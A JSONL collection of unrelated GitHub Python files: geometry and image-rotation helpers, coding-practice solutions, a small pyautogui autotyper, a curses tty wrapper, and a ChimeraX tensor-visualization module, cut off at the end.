-np.sin(roll), 0],\r\n                   [np.sin(roll), np.cos(roll), 0],\r\n                   [0, 0, 1]])\r\n    R = np.dot(np.dot(Rx, Ry), Rz)\r\n    return R\r\n","repo_name":"keyunj/fptools","sub_path":"fp_3dFunctions/3D_PtProcess/PtFunctions.py","file_name":"PtFunctions.py","file_ext":"py","file_size_in_byte":5543,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"17911805062","text":"# Imports\r\nimport pyautogui\r\nimport time\r\n# Variables\r\narray_repetir = str(input(\"Enter the word to repeat: \"))\r\ntiempo_antes_iniciar = int(input(\"Enter the delay before starting: \"))\r\ntiempo_entre__envios = int(input(\"Enter the delay between messages: \"))\r\n# Main\r\ntime.sleep(tiempo_antes_iniciar)\r\nwhile True:\r\n    pyautogui.typewrite(array_repetir)\r\n    time.sleep(tiempo_entre__envios)\r\n    pyautogui.press(\"enter\")","repo_name":"SrSpooderman/Script_Spamer","sub_path":"Palabra.py","file_name":"Palabra.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32408575520","text":"import numpy as np\nimport logging,sys\nimport math\nfrom scipy.ndimage.interpolation import rotate\nimport matplotlib.pyplot as plt\n\ndef op(input, angle, visual=False):\n    nPix = input.shape[0]\n    inpRep = np.tile(input, (3, 3))\n    outRep = rotate(inpRep, angle, reshape=False)\n    out = outRep[nPix:2 * nPix, nPix:2 * nPix]\n\n    if visual:\n        plt.subplot(2, 2, 1)\n        plt.imshow(input,cmap = plt.get_cmap('gray'))\n        plt.title('Input')\n        plt.subplot(2, 2, 2)\n        plt.imshow(out, cmap=plt.get_cmap('gray'))\n        plt.title('Output')\n        plt.subplot(2, 2, 3)\n        plt.imshow(inpRep, cmap=plt.get_cmap('gray'))\n        plt.title('Input 3x3')\n        plt.subplot(2, 2, 4)\n        plt.imshow(outRep, cmap=plt.get_cmap('gray'))\n        plt.title('Output 3x3')\n        plt.show()\n    return out\n\nif __name__ == '__main__':\n\n    # tested using a 6x6 image\n    img = np.loadtxt(sys.argv[1])\n    ang = float(sys.argv[2]) # in degrees\n    visual = bool(sys.argv[3])\n    result = op(img,ang,visual)\n\n\n","repo_name":"evanseitz/ManifoldEM_Python","sub_path":"modules/rotatefill.py","file_name":"rotatefill.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"61"} +{"seq_id":"24760692951","text":"def is_overlapping(pair):\n    separated_pairs = pair.split(\",\")\n    first_interval = separated_pairs[0].split(\"-\")\n    second_interval = separated_pairs[1].split(\"-\")\n    if int(first_interval[0]) <= int(second_interval[0]) and int(second_interval[1]) <= int(first_interval[1]):\n        return True\n    if int(second_interval[0]) <= int(first_interval[0]) and int(first_interval[1]) <= int(second_interval[1]):\n        return True\n    return False\n\n\nwith open(\"input.txt\", \"r\") as input:\n    data = input.read().split(\"\\n\")\n    overlapping_pairs = filter(is_overlapping, data)\n    result = len(list(overlapping_pairs))\n","repo_name":"WiebkeFr/advent-of-code-2022","sub_path":"day-04/part-01.py","file_name":"part-01.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42070799903","text":"import os\nimport sys\nimport locale\n\ndef tty_wrapper(function, *args, **kwargs):\n    stdin_fd = os.dup(sys.stdin.fileno())\n    stdout_fd = os.dup(sys.stdout.fileno())\n    # set stdin to tty\n    tty_in = open('/dev/tty', 'r')\n    os.dup2(tty_in.fileno(), sys.stdin.fileno())\n    # set stdout to tty\n    tty_out = open('/dev/tty', 'w')\n    
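`ComputePt` in the PtFunctions record above estimates each local surface normal by SVD of a centered neighbourhood, taking the right-singular vector with the smallest singular value. A self-contained numpy illustration of that step on synthetic data (not the fingerprint pipeline itself):

```python
import numpy as np

rng = np.random.default_rng(0)
# Noisy samples from the plane z = 0.2*x - 0.1*y.
xy = rng.uniform(-1, 1, size=(200, 2))
z = 0.2 * xy[:, 0] - 0.1 * xy[:, 1] + rng.normal(0, 1e-3, 200)
points = np.column_stack([xy, z])

centered = points - points.mean(axis=0)
_, s, vt = np.linalg.svd(centered)
normal = vt[np.argmin(s)]       # singular values are sorted, so this is vt[-1]
normal /= np.sign(normal[2])    # orient consistently (+z side)
print(normal)                   # ~ [-0.196, 0.098, 0.976], i.e. (-0.2, 0.1, 1) normalized
```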
os.dup2(tty_out.fileno(), sys.stdout.fileno())\n # os.system('ls -l /proc/self/fd/')\n locale.setlocale(locale.LC_ALL, '')\n import curses\n result = curses.wrapper(function, *args, **kwargs)\n # reset stdin and stdout\n os.dup2(stdin_fd, sys.stdin.fileno())\n os.dup2(stdout_fd, sys.stdout.fileno())\n return result\n","repo_name":"fphammerle/ioex","sub_path":"ioex/cursesex.py","file_name":"cursesex.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33148174817","text":"'''\nProblem: Given an array of integers, return indices of the two numbers such\nthat they add up to a specific target\n\nRestate: I'm going to have a a function that takes in a list of integers,\nas well as a target. My job is to find and return the pair of integers\nwho's sum is the target, correct?\n\nQuestions:\n- Will the array be sorted?\n- Will there be any negative integers?\n- Are there duplicates in the array?\n- Are the arrays always going to be relatively small?\n\nAssumptions:\n- Numbers will always be integers\n- Input is sorted\n- Return type is array of two values\n'''\n\n\ndef twoSum(nums, target):\n for i in range(len(nums)):\n for x in range(i+1, len(nums)):\n sum = nums[i] + nums[x]\n if sum == target:\n return[nums[i],nums[x]]\n return False\n\n\n'''\nProblem: Merge two sorted linked lists and return it as a new list. The new\nlist should be made by splicing together the nodes of the first two lists.\n\nRestate: I'm going to have two linked lists, and my goal is to combine both\nand have them sorted in a new linked list.\n\n\nQuestions:\n- Will there be any negative integers?\n- Are there duplicates in a specific array?\n- Are the arrays always going to be relatively small?\n\nAssumptions:\n- Numbers will always be integers\n- Return type is array of both initial lists merged together\n\nPSUDOCODE:\n\n1. create node class\n2. create method header that takes in 2 ll\n3. create head and curr\n4. loop through the lists while there is data left\n5. check which is greater from both lists and add that to list\n6. 
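`tty_wrapper` in the cursesex record above temporarily re-points stdin/stdout at the controlling terminal so a curses function can run even while the process's standard streams are piped; note that the saved `stdin_fd`/`stdout_fd` duplicates are restored via `dup2` but never closed. A hypothetical call, with an arbitrary curses payload:

```python
# Hypothetical usage of tty_wrapper from the record above; ask_key is an
# example payload, not part of the original module.
def ask_key(stdscr):
    stdscr.addstr(0, 0, "press any key")
    return stdscr.getkey()

# key = tty_wrapper(ask_key)  # needs a controlling terminal at /dev/tty
```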
return\n'''\n\n\nclass Node:\n def __init__(self, data = None, next=None):\n self.val = x\n self.next = next\n\nclass Solution:\n def mergeTwoLists(self, l1: Node, l2: Node) -> Node:\n curr = Node()\n head = curr\n while l1 or l2:\n if l1 and (not l2 or l1.val <= l2.val):\n curr.next = Node(l1.val)\n l1 = l1.next\n else:\n curr.next = Node(l2.val)\n l2 = l2.next\n curr = curr.next\n return head.next\n\n\n\ndef main():\n print(\"yo\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"iOSGonzo/CodingChallenges","sub_path":"leetcode.py","file_name":"leetcode.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15017346291","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 19 13:17:18 2020\n\n@author: albertsmith\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 4 15:05:03 2020\n\n@author: albertsmith\n\nCollection of functions for plotting residual tensors onto molecules in Chimera\n\"\"\"\n\n\nimport os\ncurdir=os.getcwd()\nimport numpy as np\nfrom scipy.spatial import Delaunay\nfrom mpl_toolkits import mplot3d\n#from mayavi.mlab import triangular_plot\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nos.chdir('../Struct')\nfrom vf_tools import d2,Spher2pars,norm,getFrame,Rspher,sc2angles\nos.chdir('../chimera')\nfrom chimera_funs import chimera_path,run_command\nfrom shutil import copyfile\nos.chdir(curdir)\n\n\ndef get_path(filename=None):\n \"\"\"This function opens a file for writing, putting it in the same folder as \n the chimera_funs.py script\"\"\"\n dir_path = os.path.dirname(os.path.realpath(__file__))\n \n if filename is None:\n return dir_path\n else:\n full_path=os.path.join(dir_path,filename)\n return full_path\n \n \ndef tensor2xyz(delta,eta,alpha,beta,gamma,sc=2.18,q=8):\n \"\"\"\n Calculates x,y, and z coordinates for a rank-2 tensor having delta and eta, \n and euler angles alpha, beta, and gamma. The scaling is set so that an \n unaveraged tensor spans the full length of an H–C bond. Can be adjusted for\n other bond lengths.\n \"\"\"\n \n sc=np.sqrt(2/3)*sc\n \n a,b=sphere(q)\n \n A=[-1/2*delta*eta,0,np.sqrt(3/2)*delta,0,-1/2*delta*eta] #Components in PAS\n \n #0 component after rotation by a and b\n A0=np.array([A[mp+2]*d2(b,m=0,mp=mp)*np.exp(1j*mp*a) for mp in range(-2,3)]).sum(axis=0).real\n \n #Coordinates before rotation by alpha, beta, gamma\n x0=np.cos(a)*np.sin(b)*np.abs(A0)*sc/2\n y0=np.sin(a)*np.sin(b)*np.abs(A0)*sc/2\n z0=np.cos(b)*np.abs(A0)*sc/2\n\n \n #Rotate by alpha\n x1,y1,z1=x0*np.cos(alpha)+y0*np.sin(alpha),-x0*np.sin(alpha)+y0*np.cos(alpha),z0\n #Rotate by beta\n x2,y2,z2=x1*np.cos(beta)-z1*np.sin(beta),y1,np.sin(beta)*x1+np.cos(beta)*z1\n #Rotate by gamma\n x,y,z=x2*np.cos(gamma)+y2*np.sin(gamma),-x2*np.sin(gamma)+y2*np.cos(gamma),z2\n\n \"\"\"\n Here, we create a group index. 
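`Node.__init__` in the leetcode record above assigns `self.val = x`, but its only data parameter is named `data`, so constructing any node raises `NameError`. A corrected sketch of the class:

```python
# Sketch of the fix: bind the constructor argument that actually exists.
class Node:
    def __init__(self, data=None, next=None):
        self.val = data   # was: self.val = x  (NameError at call time)
        self.next = next

n = Node(1, Node(2))
print(n.val, n.next.val)  # 1 2
```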
The plots come out nicer if we separate positive\n and negative parts (A0) and separate different lobes of the tensor\n \"\"\"\n \n# index=list()\n# i=np.argwhere(A0>=0).squeeze()\n# index.append(i)\n# index.append(i+n)\n# \n# if eta>0.15:\n# i=np.argwhere(np.logical_and(A0<=0,np.logical_or(a<=np.pi/2,a>3*np.pi/2))).squeeze()\n# index.append(i)\n# i=np.argwhere(np.logical_and(A0<=0,np.logical_or(a>np.pi/2,a<=3*np.pi/2))).squeeze()\n# index.append(i)\n# else:\n# i=np.argwhere(A0<=0).squeeze()\n# index.append(np.concatenate((i,i+n)))\n \n# index=[np.argwhere(A0>=0).squeeze(),np.argwhere(A0<=0).squeeze()]\n\n return x,y,z,A0\n\ndef sphere(q=8):\n \"\"\"\n Returns a set of Euler angles (alpha,beta) over a sphere. Note- this is not\n a valid powder average for simulations– the first alpha value is redundant\n with the last alpha value for each beta (that is, alpha[-1]=alpha[0]+2*pi,\n for each beta). This allows us to use a triangulation algorithm for 3D \n plotting but would distort simulation results.\n \n alpha,beta = sphere(q=8)\n \"\"\"\n NP=np.ceil(q*np.sin(np.arange(0.5,q+0.5)*np.pi/(2*q))).astype(int)\n NP41=4*NP+1\n \n nF0=NP.sum()\n nF = NP41.sum()\n \n alpha=np.zeros(nF)\n beta=np.zeros(nF)\n \n theta_j = 0;\n count = 0;\n\n for j in range(q):\n dtheta = np.arccos(np.cos(theta_j) - NP[j]/nF0 ) - theta_j\n beta[np.arange(count,count+NP41[j])] = theta_j + dtheta/2\n dphi = np.pi/(2*NP[j]);\n alpha[count:count+4*NP[j]] = np.linspace(0.5*dphi,(4*NP[j] - 0.5)*dphi,4*NP[j]);\n alpha[count+4*NP[j]]=alpha[count+4*NP[j]-1]-2*np.pi\n count = count + NP41[j];\n theta_j += dtheta;\n \n alpha=np.concatenate(([0],alpha,alpha[::-1],[0]))\n beta=np.concatenate(([0],beta,np.pi-beta[::-1],[np.pi]))\n \n return alpha,beta\n \n\ndef draw_tensorsX(data,tensors='A_m0_finF',index=None,tstep=0,sc=2.09,fileout=None,\\\n scene=None,pos=None,png_opts=None,chimera_cmds=None,marker=None):\n \"\"\"\n Plots averaged tensors onto a molecule in chimera. A molecule object is required,\n where sel1/sel2 determine which bonds the molecules are to be plotted onto.\n The tensors themselves should also be provided, where they are defined in\n the frame of the bond. These may be provided by either giving a data object\n as the first argument, which then contains both the molecule objection and\n the tensors (the tensors should be in data.vars, and then one provides a\n string 'tensors' which gives the appropriate key to find the tensors). \n Alternatively, one may provide the molecule object as the first argument,\n in which case 'tensors' should be a 5xN numpy array with the tensors given \n directly.\n \n Note, the molecule object must still contain the tensor frame function \n (mol._vft is not None). This should return the orientation of the bond. \n mol.sel1 and mol.sel2 should define the atoms yielding the bond position.\n \n Optional arguments:\n sc: Deterines the length of tensors. If provided, this value specifies\n the length of a tensor with delta=1,eta=0. If not provide or None,\n the largest tensor is scaled to extend 2x the mean bond length,\n which is determined from the atom positions in data.sens.mol.sel1\n and data.sens.mol.sel2 (if pos is provided, then bond lengths \n are instead assumed to be 1.09)\n q: Quality of the tensor plot. Default is 10 (smoother tensors for\n higher values)\n index: Index of the tensors to be plotted. Default plots all tensors\n pos: Position of the tensors to plotted. 
Default position taken from\n mean position between mol.sel1 and mol.sel2\n tensors:Specify which tensor to plot or provide the tensors directly. \n Options are \"D2inf\" (D2 evaluated at infinite time), \"avg_tensor\"\n which is the averaged rank-2 tensor, or one may provide a dict\n specifying the tensor directly (with delta (N,),eta(N,),euler(3,N)).\n Note, if tensors is provided directly, one may replace the data\n object with a molecule object\n fileout:Save the resulting figure to a png\n scene: Load a scene saved previously in chimera\n png_opts:A string passed to chimera while saving the image\n (Command: copy file {fileout} png {png_opts})\n chimera_cmds:List of valid chimera commands (executed within chimera)\n marker: Color in one or more tensors with a different color (green/yellow)\n instead of red/blue). List of indices or logical index\n \n draw_tensorsX(data,sc=None,tensors='A_m0_finF',index=None,fileout=None,scene=None,pos=None,png_opts=None,chimera_cmds=None)\n \n \"\"\"\n \n \n \"Setup\"\n if not isinstance(tensors,str) and hasattr(data,'pdb'):\n mol=data\n elif isinstance(tensors,str):\n if tensors in data.vars:\n tensors=data.vars[tensors]\n mol=data.sens.molecule\n \n if index is None:\n index=np.arange(tensors.shape[1],dtype=int)\n else:\n index=np.array(index,dtype=bool) if (np.size(index)==tensors.shape[1] and np.max(index)<2) else np.array(index,dtype=int)\n tensors=tensors[:,index]\n\n \n\n mol.mda_object.trajectory[tstep] #Go to the requested time step\n\n \"Get the current positions of the bonds\"\n if pos is None:\n pos=(mol.sel1.positions[index]+mol.sel2.positions[index]).T/2\n \n \"Get the current orientations of the bonds, rotate tensors accordingly\"\n vZ,vXZ=mol._vft()\n vZ=norm(vZ)\n scF=getFrame(vZ[:,index],vXZ[:,index])\n tensors=Rspher(tensors,*scF)\n \n \"Convert tensors into parameters\"\n tensors=Spher2pars(tensors)\n \n \"Make sure we have the pdb or a path to the scene was given\"\n if mol.pdb is not None:\n a=np.char.find(mol.pdb[::-1],'.')\n b=np.char.find(mol.pdb[::-1],'_')\n ts=np.array(mol.pdb[-b:-a-1],dtype=int)\n if tstep!=ts and scene is None:\n mol.pdb=None\n \n sel=None\n if scene is not None:\n pdb=None\n# elif mol.pdb is not None:\n# pdb=mol.pdb\n else:\n try:\n if np.unique(mol.sel1.segids).size==1 and np.unique(mol.sel1.resids).size==1:\n select='resid {0} and segid {1}'.format(mol.sel1[0].resid,mol.sel1[0].segid)\n elif np.unique(mol.sel1.segids).size==1:\n select='segid {1}'.format(mol.sel1[0].segid)\n elif np.unique(mol.sel1.resids).size==1:\n select='resid {0}'.format(mol.sel1[0].resid)\n sel=mol.mda_object.select_atoms(select)\n mol.mda_object.trajectory[tstep]\n pdb=get_path('pdb{0}.pdb'.format(tstep))\n mp=sel.positions.mean(0)\n sel.positions=sel.positions-mp\n pos=(pos.T-mp).T\n sel.write(pdb)\n# mol.MDA2pdb(tstep=tstep,select=select)\n# pdb=mol.pdb\n except:\n print('Failed to created pdb for drawing')\n return\n \n\n delta=tensors[0]\n eta=tensors[1]\n euler=tensors[2:]\n \n theta_steps=100\n phi_steps=50\n positive_color=(255,100,100,255)\n negative_color=(100,100,255,255)\n \n run_chimeraX(delta,eta,euler,pos,theta_steps,phi_steps,positive_color,\\\n negative_color,fileout,png_opts,chimera_cmds,sc=sc,pdb=pdb,scene=scene,marker=marker)\n \ndef only_tensorsX(tensors=None,delta=None,eta=None,euler=None,index=None,fileout=None,pos=None,png_opts=None,chimera_cmds=None):\n \"\"\"\n Draws tensors in chimeraX, using python options.\n \n only_tensorsX(delta,eta=None,euler=None,fileout=None,pos=None,png_opts=None)\n \n If 
multiple tensors are given, this will automatically space them out. One\n may also provide the position\n \n chimera_cmds is a list of strings that are applied as commands in chimera\n \n fileout will save the chimera window as a png. Program will automatically close\n after saving! (intended for scripting multiple images, hence we don't want\n lots of chimera instances staying open)\n \n png_opts is a string appended to the 'save' command if fileout is used\n \n \"\"\"\n \n \n \n delta=np.atleast_1d(delta)\n n=delta.size\n eta=np.zeros(n) if eta is None else np.atleast_1d(eta)\n euler=np.zeros([3,n]) if euler is None else np.atleast_2d(euler)\n if euler.shape[0]==1:euler=euler.T\n \n \"Apply index\"\n if index is None:index=np.ones(n,dtype=bool)\n index=np.ones(n,dtype=bool) if index is None else np.atleast_1d(index)\n delta=delta[index]\n eta=eta[index]\n euler=euler[:,index]\n \n \n theta_steps=100\n phi_steps=50\n positive_color=(255,100,100,255)\n negative_color=(100,100,255,255)\n run_chimeraX(delta,eta,euler,pos,theta_steps,phi_steps,positive_color,\\\n negative_color,fileout,png_opts,chimera_cmds)\n\ndef run_chimeraX(delta,eta,euler,pos,theta_steps,phi_steps,\n positive_color,negative_color,fileout,png_opts,\n chimera_cmds,sc=1,pdb=None,scene=None,marker=None):\n n=delta.size\n rand_index=np.random.randint(1e6)\n full_path=get_path('chimera_script{0:06d}.py'.format(rand_index))\n \n tensor_file=get_path('tensors{0:06d}.txt'.format(rand_index))\n \n \"Get the positions of each tensor\"\n if pos is None:\n step=np.abs(delta).max()*1.1\n pos=np.zeros([3,n])\n pos[0]=np.linspace(0,n*step,n,endpoint=False)\n else:\n pos=np.atleast_2d(pos)\n if pos.shape[0]==1:pos=pos.T\n \n \"Write tensors to file\"\n write_tensor(tensor_file,delta,eta,euler,pos,marker)\n \n\n \n with open(full_path,'w') as f:\n py_line(f,'import os')\n py_line(f,'import numpy as np')\n py_line(f,run_command(version='X'))\n \n copy_funs(f) #Copy required functions into chimeraX script\n \n \n py_line(f,'try:')\n if scene is not None:\n WrCC(f,'open '+scene,1)\n elif pdb is not None:\n WrCC(f,'open '+pdb,1)\n py_line(f,'load_surface(session,\"{0}\",sc={1},theta_steps={2},phi_steps={3},positive_color={4},negative_color={5})'\\\n .format(tensor_file,sc,theta_steps,phi_steps,positive_color,negative_color),1)\n if chimera_cmds is not None:\n if isinstance(chimera_cmds,str):chimera_cmds=[chimera_cmds]\n for cmd in chimera_cmds:\n WrCC(f,cmd,1)\n if fileout is not None:\n if fileout[-4:]!='.png':fileout=fileout+'.png'\n if png_opts is None:png_opts=''\n WrCC(f,\"save \" +fileout+' '+png_opts,1)\n \n py_line(f,'except:')\n py_line(f,'print(\"Error in chimera script\")',1)\n py_line(f,'finally:')\n py_line(f,'os.remove(\"{0}\")'.format(full_path),1)\n py_line(f,'os.remove(\"{0}\")'.format(tensor_file),1)\n if pdb is not None:py_line(f,'os.remove(\"{0}\")'.format(pdb))\n if fileout is not None: #Exit if a file is saved\n WrCC(f,'exit',1)\n \n \n copyfile(full_path,full_path[:-9]+'.py')\n copyfile(tensor_file,tensor_file[:-10]+'.txt')\n \n os.spawnl(os.P_NOWAIT,chimera_path(version='X'),chimera_path(version='X'),full_path)\n\ndef copy_funs(f):\n \"\"\"\n Copys all functions in THIS file below the comment \"Files used inside ChimeraX\"\n \n Input is the file handle, f, to which the pythons functions should be copied\n \n copy_funs(f)\n \"\"\"\n \n with open(get_path('vis3D.py'),'r') as funs:\n start_copy=False\n for line in funs:\n if start_copy:\n f.write(line)\n else:\n if len(line)>=30 and line[:30]==\"#%% Files used inside 
ChimeraX\":\n start_copy=True\n \ndef py_line(f,text,nt=0):\n \"\"\"\n Prints a line to a file for reading as python code. Inserts the newline and\n also leading tabs (if nt specified)\n \n python_line(f,text,nt=0)\n \"\"\"\n \n for _ in range(nt):\n f.write('\\t')\n f.write(text)\n f.write('\\n')\n\ndef write_tensor(filename,delta,eta=None,euler=None,pos=None,marker=None):\n \"\"\"\n Writes out a tab-separated file with delta, eta, alpha, beta, gamma, and\n x,y,z for tensors. For reading within ChimeraX\n \n write_tensor(filename,delta,eta=None,euler=None,pos=None,marker=None)\n \"\"\"\n \n delta=np.array(delta)\n n=delta.size\n \n #Defaults, make sure all numpy arrays\n eta=np.zeros(n) if eta is None else np.array(eta)\n euler=np.zeros([3,n]) if euler is None else np.array(euler)\n pos=np.zeros([3,n]) if pos is None else np.array(pos)\n if marker is None:\n marker=np.zeros(n)\n else:\n if not(hasattr(marker,'__len__')):marker=[marker]\n if len(marker)1:\n m1=marker\n marker=np.zeros(n)\n marker[np.array(m1,dtype=int)]=1\n \n if len(euler)==3:\n alpha,beta,gamma=euler\n else:\n alpha,beta,gamma=sc2angles(*euler)\n X,Y,Z=pos\n \n with open(filename,'w') as f:\n for vals in zip(delta,eta,alpha,beta,gamma,X,Y,Z,marker):\n for v in vals[:-1]:f.write('{0:16.8}\\t'.format(v))\n f.write('{0:d}\\t'.format(int(vals[-1])))\n f.write('\\n')\n\n\ndef WrCC(f,command,nt=1):\n \"Function to print chimera commands correctly\"\n for _ in range(nt):\n f.write('\\t')\n f.write('rc(session,\"{0}\")\\n'.format(command))\n#%% Files used inside ChimeraX (don't edit this comment!!..it will break the code)\n\"\"\"\nEverything after these lines is printed into the chimeraX script, so don't add\nanything below that you don't need in chimeraX\n\"\"\"\ndef sphere_triangles(theta_steps=100,phi_steps=50):\n \"\"\"\n Creates arrays of theta and phi angles for plotting spherical tensors in ChimeraX.\n Also returns the corresponding triangles for creating the surfaces\n \"\"\"\n \n theta=np.linspace(0,2*np.pi,theta_steps,endpoint=False).repeat(phi_steps)\n phi=np.repeat([np.linspace(0,np.pi,phi_steps,endpoint=True)],theta_steps,axis=0).reshape(theta_steps*phi_steps)\n \n triangles = []\n for t in range(theta_steps):\n for p in range(phi_steps-1):\n i = t*phi_steps + p\n t1 = (t+1)%theta_steps\n i1 = t1*phi_steps + p\n triangles.append((i,i+1,i1+1))\n triangles.append((i,i1+1,i1))\n \n return theta,phi,triangles\n \ndef spherical_surface(delta,eta=None,euler=None,pos=None,sc=2.09,\n theta_steps = 100,\n phi_steps = 50,\n positive_color = (255,100,100,255), # red, green, blue, alpha, 0-255 \n negative_color = (100,100,255,255)):\n \"\"\"\n Function for generating a surface in ChimeraX. 
delta, eta, and euler angles\n should be provided, as well positions for each tensor (length of all arrays\n should be the same, that is (N,), (N,), (3,N), (3,N) respectively.\n \n Returns arrays with the vertices positions (Nx3), the triangles definitions\n (list of index triples, Nx3), and a list of colors (Nx4)\n \n xyz,tri,colors=spherical_surface(delta,eta=None,euler=None,pos=None,\n theta_steps=100,phi_steps=50,\n positive_color=(255,100,100,255),\n negative_color=(100,100,255,255))\n \"\"\"\n # Compute vertices and vertex colors\n a,b,triangles=sphere_triangles(theta_steps,phi_steps)\n \n if euler is None:euler=[0,0,0]\n if pos is None:pos=[0,0,0]\n if eta is None:eta=0\n \n # Compute r for each set of angles\n sc=np.sqrt(2/3)*sc\n \n A=[-1/2*delta*eta,0,np.sqrt(3/2)*delta,0,-1/2*delta*eta] #Components in PAS\n \n #0 component after rotation by a and b\n A0=np.array([A[mp+2]*d2(b,m=0,mp=mp)*np.exp(1j*mp*a) for mp in range(-2,3)]).sum(axis=0).real\n \n #Coordinates before rotation by alpha, beta, gamma\n x0=np.cos(a)*np.sin(b)*np.abs(A0)*sc/2\n y0=np.sin(a)*np.sin(b)*np.abs(A0)*sc/2\n z0=np.cos(b)*np.abs(A0)*sc/2\n\n alpha,beta,gamma=euler\n #Rotate by alpha\n x1,y1,z1=x0*np.cos(alpha)+y0*np.sin(alpha),-x0*np.sin(alpha)+y0*np.cos(alpha),z0\n #Rotate by beta\n x2,y2,z2=x1*np.cos(beta)-z1*np.sin(beta),y1,np.sin(beta)*x1+np.cos(beta)*z1\n #Rotate by gamma\n x,y,z=x2*np.cos(gamma)+y2*np.sin(gamma),-x2*np.sin(gamma)+y2*np.cos(gamma),z2\n\n x=x+pos[0]\n y=y+pos[1]\n z=z+pos[2]\n \n# xyz=[[x0,y0,z0] for x0,y0,z0 in zip(x,y,z)]\n #Determine colors\n colors=np.zeros([A0.size,4],np.uint8)\n colors[A0>=0]=positive_color\n colors[A0<0]=negative_color\n \n\n # Create numpy arrays\n# xyz = np.array(xyz, np.float32)\n xyz=np.ascontiguousarray(np.array([x,y,z]).T,np.float32) #ascontiguousarray forces a transpose in memory- not just editing the stride\n colors = np.array(colors, np.uint8)\n tri = np.array(triangles, np.int32)\n\n return xyz,tri,colors\n \n\ndef load_tensor(filename):\n \"\"\"\n Reads in a tab-separated file with delta, eta, alpha,beta, gamma, and x,y,z\n for a set of tensors. 
\n \n delta,eta,euler,pos=load_tensor(filename)\n \"\"\"\n delta=list()\n eta=list()\n alpha=list()\n beta=list()\n gamma=list()\n x=list()\n y=list()\n z=list()\n marker=list()\n with open(filename,'r') as f:\n for line in f:\n out=line.strip().split('\\t')\n out=[np.array(o,float) for o in out]\n delta.append(out[0])\n eta.append(out[1])\n alpha.append(out[2])\n beta.append(out[3])\n gamma.append(out[4])\n x.append(out[5])\n y.append(out[6])\n z.append(out[7])\n marker.append(out[8])\n\n delta=np.array(delta)\n eta=np.array(eta)\n euler=np.array([alpha,beta,gamma]).T\n pos=np.array([x,y,z]).T\n marker=np.array(marker)\n\n return delta,eta,euler,pos,marker \n \n \n\ndef load_surface(session,tensor_file,sc=2.09,theta_steps=100,phi_steps=50,\n positive_color=(255,100,100,255),negative_color=(100,100,255,255)):\n \n Delta,Eta,Euler,Pos,Marker=load_tensor(tensor_file)\n \n from chimerax.core.models import Surface\n from chimerax.surface import calculate_vertex_normals,combine_geometry_vntc\n \n geom=list()\n \n for k,(delta,eta,euler,pos,marker) in enumerate(zip(Delta,Eta,Euler,Pos,Marker)):\n if marker==1:\n pc=(100,255,100,255)\n nc=(255,255,100,255)\n else:\n pc=positive_color\n nc=negative_color\n xyz,tri,colors=spherical_surface(\\\n delta=delta,eta=eta,euler=euler,pos=pos,\\\n sc=sc,theta_steps=theta_steps,\\\n phi_steps=phi_steps,\\\n positive_color=pc,\\\n negative_color=nc)\n\n norm_vecs=calculate_vertex_normals(xyz,tri)\n \n geom.append((xyz,norm_vecs,tri,colors)) \n \n xyz,norm_vecs,tri,colors=combine_geometry_vntc(geom) \n s = Surface('surface',session)\n s.set_geometry(xyz,norm_vecs,tri)\n s.vertex_colors = colors\n session.models.add([s])\n\n return s\n\n\ndef d2(c=0,s=None,m=None,mp=0):\n \"\"\"\n Calculates components of the d2 matrix. By default only calculates the components\n starting at m=0 and returns five components, from -2,-1,0,1,2. One may also\n edit the starting component and select a specific final component \n (mp=None returns all components, whereas mp may be specified between -2 and 2)\n \n d2_m_mp=d2(m,mp,c,s) #c and s are the cosine and sine of the desired beta angle\n \n or\n \n d2_m_mp=d2(m,mp,beta) #Give the angle directly\n \n Setting mp to None will return all values for mp in a 2D array\n \n (Note that m is the final index)\n \"\"\"\n \n if s is None:\n c,s=np.cos(c),np.sin(c)\n \n \"\"\"\n Here we define each of the components as functions. 
We'll collect these into\n an array, and then call them out with the m and mp indices\n \"\"\"\n \"First, for m=-2\"\n \n if m is None or mp is None:\n if m is None and mp is None:\n print('m or mp must be specified')\n return\n elif m is None:\n if mp==-2:\n index=range(0,5)\n elif mp==-1:\n index=range(5,10)\n elif mp==0:\n index=range(10,15)\n elif mp==1:\n index=range(15,20)\n elif mp==2:\n index=range(20,25)\n elif mp is None:\n if m==-2:\n index=range(0,25,5)\n elif m==-1:\n index=range(1,25,5)\n elif m==0:\n index=range(2,25,5)\n elif m==1:\n index=range(3,25,5)\n elif m==2:\n index=range(4,25,5)\n else:\n index=[(mp+2)*5+(m+2)]\n \n out=list() \n for i in index:\n #mp=-2\n if i==0:x=0.25*(1+c)**2\n if i==1:x=0.5*(1+c)*s\n if i==2:x=np.sqrt(3/8)*s**2\n if i==3:x=0.5*(1-c)*s\n if i==4:x=0.25*(1-c)**2\n #mp=-1\n if i==5:x=-0.5*(1+c)*s\n if i==6:x=c**2-0.5*(1-c)\n if i==7:x=np.sqrt(3/8)*2*c*s\n if i==8:x=0.5*(1+c)-c**2\n if i==9:x=0.5*(1-c)*s\n #mp=0\n if i==10:x=np.sqrt(3/8)*s**2\n if i==11:x=-np.sqrt(3/8)*2*s*c\n if i==12:x=0.5*(3*c**2-1)\n if i==13:x=np.sqrt(3/8)*2*s*c\n if i==14:x=np.sqrt(3/8)*s**2\n #mp=1\n if i==15:x=-0.5*(1-c)*s\n if i==16:x=0.5*(1+c)-c**2\n if i==17:x=-np.sqrt(3/8)*2*s*c\n if i==18:x=c**2-0.5*(1-c)\n if i==19:x=0.5*(1+c)*s\n #mp=2\n if i==20:x=0.25*(1-c)**2\n if 